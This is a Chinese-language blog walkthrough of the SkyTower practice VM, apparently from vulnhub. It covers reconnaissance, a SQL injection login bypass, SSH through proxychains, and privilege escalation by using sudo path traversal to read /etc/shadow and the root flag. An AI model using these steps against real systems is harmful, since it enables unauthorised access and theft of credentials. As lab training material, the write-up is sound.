Skytower靶机

最新推荐文章于 2024-07-31 20:40:53 发布
最新推荐文章于 2024-07-31 20:40:53 发布
阅读量325 收藏 4
点赞数 3
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84564260/article/details/140830834
版权

一 信息收集

查看靶机的mac地址

kail扫描ip

访问ip

查看开放的端口

nmap -sV -p- 192.168.7.61

目录扫描查看是否有有用的信息

dirb http://192.168.7.61

返回登录页面,登录时使用burp抓包,并在email处拼接 ',发现返回包出现sql报错

接着拼接or 1=1 # 发现被过滤了

尝试使用||代替or,拼接'||1#,显示登录成功,并出现一组账号密码:john hereisjohn

二 权限获取

得到账号密码 尝试ssh连接 但是连接失败 使用代理工具proxychains进行配置代理

vi /etc/proxychains4.conf

使用proxychains登录 发现登录后会直接退出

proxychains ssh john@192.168.7.61

尝试在登陆同时执行命令

查看文件 看到.bashrc文件 发现这个文件有一个退出代码

将该文件删除就可以解决自动退出问题

cd到网站目录 查看配置文件

查看login.php文件

连接mysql

mysql -uroot -proot

查看数据库数据

    show databases;
    use SkyTech;
    show tables;
    select * from login;

在john用户处输入sudo -l查看可提权的命令,发现没有

sudo 切换sara用户 发现无法切换 也得删掉.bashrc文件

三 权限提升

删掉.bashrc文件

proxychains ssh sara@192.168.7.61 ls -la
proxychains ssh sara@192.168.7.61 rm .bashrc
proxychains ssh sara@192.168.7.61

发现sara也是普通用户 输入sudo -l 查看显示允许当前用户使用的命令

发现可以在/accounts/*使用root的cat和ls命令

sudo cat /accounts/../etc/shadow

sudo /bin/cat /accounts/../../../root/flag.txt

成功提权

Clearlove~7
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SkyTower:动作平台游戏,爬塔到天上去
06-08
SkyTower: 动作平台游戏的开发与技术解析》 在游戏开发的世界里,"SkyTower"是一款引人入胜的动作平台游戏,其核心玩法是挑战玩家攀登高耸入云的天空塔。这款游戏的独特之处在于它融合了动作、平台跳跃和攀登元素...
SkyTower靶机
m0_61995767的博客
07-30 748
KeyTower打靶记录
skytower靶机
weixin_74232792的博客
07-31 243
用同样的方式列举root目录下的文件 sudo /bin/ls /accounts/../../../root/,发现有个flag文件,查看一下,有root用户的密码,直接切换root,成功提权。发现在accounts目录下有root权限,用以下命令查看shadow文件,cat /accounts/../etc/shadow。转换其他思路,想到刚才扫到了一个代理端口,并且开放了ssh,尝试用这个账号密码连接一下。切换从数据库中发现的其他用户,Sara用户是可以ssh连接的,另外一个不行。
SkyTower 靶机
weixin_62162207的博客
07-30 150
SkyTower 靶机
SkyTower靶机复现
最新发布
weixin_52956666的博客
07-31 348
发现ssh登陆失败,扫描端口的时候22端口状态不是open,但是3128端口开放, 是http-proxy是代理端口。因为有后台,所以数据库大概率有账号密码,cat /var/www/login.php。将网卡模式设置为仅主机模式,混杂模式设置为全部允许,并记录MAC地址。加入 ' || 1=1#进行闭合,发现闭合成功,并且爆出了账号密码。同理,vim /etc/proxychains4.conf 也一样。尝试构造sql注入,发现有报错回显,说明存在sql注入。点击注册,将靶机资源加入进入,点击启动。
SkyTower靶机渗透测试
weixin_58786230的博客
07-31 232
【代码】SkyTower靶机渗透测试。
【vulnhub】SkyTower靶机
wbplife的博客
07-30 177
靶机安装 环境:VirtualBox 这个靶机安装到Virtualbox里面,并且需要把网卡转换为桥接模式,kali也要转化为桥接模式, 在注册中打开 信息收集 靶机的IP发现 netdiscover -i eth0 -r 192.168.7.0/24 进行端口扫描 网址IP访问 存在登录框,可以尝试看是否存在SQL注入 随便输入账号密码,抓包。发现存在sql注入。 并且直接就登录进去,可以得到一个账号及密码:john / hereisjohn
谷粒商城实战笔记-62-商品服务-API-品牌管理-OSS整合测试
epitomizelu的专栏
07-25 1075
通过上述步骤,你可以在Java项目中轻松地整合阿里云OSS服务,实现文件的上传、下载等功能。阿里云OSS提供了丰富的API和工具,可以根据你的业务需求进一步定制和扩展。希望这篇博客能帮助你在Java项目中顺利整合阿里云OSS服务。如果有任何疑问或需要进一步的帮助,请随时提问!
go-kratos 学习笔记(8) redis的使用
xgs736214763的博客
07-25 378
redis的在项目中的使用是很常见的,前面有了mysql的使用redis的也差不多;也是属于在data层的操作,所以需要新建一个 NewRedisCmd方法。在internal/data/data.go中新增NewRedisCmd 方法,注入到ProviderSet。在业务层使用 data/user.go 中的ListUser 方法做个缓存。然后启动项目 kratos run 看redis的缓存。执行 wire 生成依赖。
Golang学习笔记20240725,Go语言基础语法
Python私教
07-25 663
如果我们在遍历的时候,不想要key或者value,也可以用下划线替代,下划线叫做匿名变量。go语言里面的switch语句每个case天生就是独立的,不需要加break。指针可以直接对内存地址进行操作。使用*表示指针,使用&取地址。切片在go语言里面非常常用,因为其有动态扩展的特性。运行方式3:goland右键运行。使用加号可以对字符串进行拼接。
谷粒商城实战笔记-61-商品服务-API-品牌管理-云存储开通与使用
epitomizelu的专栏
07-25 1026
文章目录一,图片云存储二,阿里云OSS1,OSS2,基于OSS的文件上传架构3,Java中使用OSS 一,图片云存储 这张图展示了文件存储的几种常见模式: 普通上传 分布式情况下的普通上传 使用自建服务器 云存储服务的情况 普通上传:在这种情况下,浏览器直接将文件上传给商品服务,然后由商品服务保存文件。这种方式简单明了,但是存在单点故障风险,因为所有文件都在同一台服务器上存储。 分布式情况下的普通上传:这是一种改进后的版本,多个商品服务共享同一个文件存储空间。然而,这种方案仍然需要自己维护文件
Java类加载器实现机制详细笔记
modelsetget的博客
07-25 621
笔记涵盖了Java类加载器的工作原理、双亲委派模型、类加载器层次结构、自定义类加载器的应用场景与实现方法,以及字节码校验的详细步骤和魔数的重要性。
鸿蒙开发笔记07--自定义组件
m0_64346512的博客
07-25 300
3、
photoshop学习笔记——选区2 套索工具
jamesP777的博客
07-25 418
3种套索工具的介绍、快捷键及特点,给出一个换天空背景的小例子
LCD 横屏切换为竖屏-I.MX6U嵌入式Linux C应用编程学习笔记基于正点原子阿尔法开发板
木木不迷茫(˵¯͒¯͒˵)的博客
07-25 463
将默认横屏显示的 LCD 屏切换为竖屏显示。LCD 屏在默认横屏模式下具有固定坐标体系,例如在 800x480 分辨率下,左上角坐标为(0, 0),右下角为(799, 479)。显存地址的计算公式为 base + (y * width + x) * pix_bytes。在竖屏模式下,应用程序认为的起点为左下角(0, 0),需要将坐标转换为实际的物理坐标。显存地址计算公式调整为 base + ((height - 1 - x) * width + y) * pix_bytes。
近期代码报错解决笔记
yatingliu的博客
07-25 373
近期解决图数据的报错笔记
《计算机网络》(学习笔记
qiqi_liuliu的博客
07-24 2125
网络(Network)由若干结点(Node)和连接这些结点的链路(Link)组成多个网络还可以通过路由器互连起来,这样就构成了一个覆盖范围更大的网络,即互联网(互连网)。因此,互联网是"网络的网络(Network of Networks)"因特网(Internet)是世界上最大的互连网络(用TCP/IP)internet是通用名词,互连的网络都叫internet注:互连、自治、集合。在计算机内部或在相邻设备之间近距离传输时,可不经过调制就在信道上直接进行的传输方式称为基带传输。
PYTHON学习笔记(八、字符串及的使用)
tommorrowwill的博客
07-25 1026
通过使用正则表达式,我们可以灵活地指定需要匹配的模式,包括具体的字符、字符集合、数量、位置等。在大量的文本处理任务中,如文本搜索、文件批量处理、数据清洗等,正则表达式可以帮助我们高效地完成工作。在1位置处,在一个完整的字符串中使用了%s占位符,在完整的字符串外面,则是变量的值,最后将会输出“ hello world ( time ) ”。的工具,它可以用来在文本中查找、替换、提取或验证特定的模式。通过格式化字符串,可以方便地将变量的值和其他文本内容组合成一个完整的字符串。我们对字符串的学习就结束了!
文件共享功能无法使用提示错误代码0x80004005【笔记
AnsonNie的博客
07-25 422
文件共享功能无法使用 错误代码0x80004005,搜索里输入“启用或关闭Windows功能”按回车键,在启用或关闭Windows功能里将SMB 1.0/CIFS文件共享支持勾选后
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值